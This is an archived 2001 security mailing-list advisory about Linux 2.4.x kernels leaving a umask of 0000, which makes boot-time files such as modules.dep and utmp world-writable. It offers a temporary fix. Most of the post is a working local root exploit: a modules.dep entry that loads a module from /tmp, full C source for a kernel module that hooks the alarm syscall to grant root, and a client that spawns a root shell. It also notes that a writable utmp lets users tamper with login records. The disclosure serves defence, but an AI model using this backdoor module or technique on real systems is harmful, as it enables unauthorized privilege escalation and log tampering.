OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joshpulltheplug.com
Date: Mon Jul 16 2001 - 09:53:01 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I posted this to the linux kernel mailing last Friday, July 13th 2001:

    Submitted by : Josh (joshpulltheplug.com), lockdown
                    (lockdownlockeddown.net) on July 16th, 2001
    Vulnerability : /lib/modules/2.4.5/modules.dep
    Tested On : Slackware 8.0. 2.4.5
    Local : Yes
    Remote : No
    Temporary Fix : umask 022 at the top of all your startup scripts
    Target : root
    Big thanks to : slider, lamagra, zen-parse
    Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                    cryptix, s0ttle, xphantom, qtip, tirancy, Loki,
                    falcon-networks.com.

            The 2.4.x kernels starting with 2.4.3 (i think) have, after
    load, left a umask of 0000. This forces any files created in the bootup
    scripts, without the command `umask 022` issued to be world writeable.
    In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same
    vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep
    world writeable. With this file world writeable, all an intruder need do is
    put something like the following in /lib/modules/`uname -r`/modules.dep
    assuming the system's startup scripts modprobe lp:

    /lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o

    /tmp/alarm.o:

    where the alarm.o module is:

    #include <linux/config.h>
    #include <linux/module.h>
    #include <linux/version.h>
    #include <linux/types.h>
    #include <asm/segment.h>
    #include <asm/unistd.h>
    #include <linux/dirent.h>
    #include <sys/syscall.h>
    #include <sys/sysmacros.h>

    #include <linux/sched.h>

    #include <linux/errno.h>
    #include <linux/fs.h>
    #include <linux/kernel.h>

    extern void* sys_call_table[];

    unsigned int (*old_alarm) (unsigned int seconds);
    unsigned int hacked_alarm (unsigned int seconds);

    unsigned int hacked_alarm(unsigned int seconds)
    {
               if(seconds == 454) {
                    current->uid = 0;
                    current->euid = 0;
                    current->gid = 0;
                    current->egid = 0;
                    return 0;
                }
       return old_alarm(seconds);
    }

    int init_module(void) {
     old_alarm=sys_call_table[SYS_alarm];
     sys_call_table[SYS_alarm] = hacked_alarm;
     return 0;
    }

    void cleanup_module(void) {
       sys_call_table[SYS_alarm] = old_alarm;
    }

    make a client:
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
      alarm(454);
      execl("/bin/sh", "sh", NULL);
    }

    which will, when the module is loaded, execute a shell as root.

            And of course with /var/run/utmp writeable, users can delete or in
    other ways manipulate their logins as they appear in
    w/who/finger/getlogin(), etc.